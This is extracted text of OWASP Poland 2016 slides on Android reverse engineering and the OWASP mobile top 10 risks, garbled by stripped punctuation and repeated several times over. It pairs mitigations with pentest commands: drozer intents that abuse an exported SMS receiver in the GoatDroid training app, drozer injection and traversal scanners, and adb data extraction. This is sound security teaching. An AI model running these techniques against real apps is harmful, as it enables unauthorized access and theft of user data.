id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
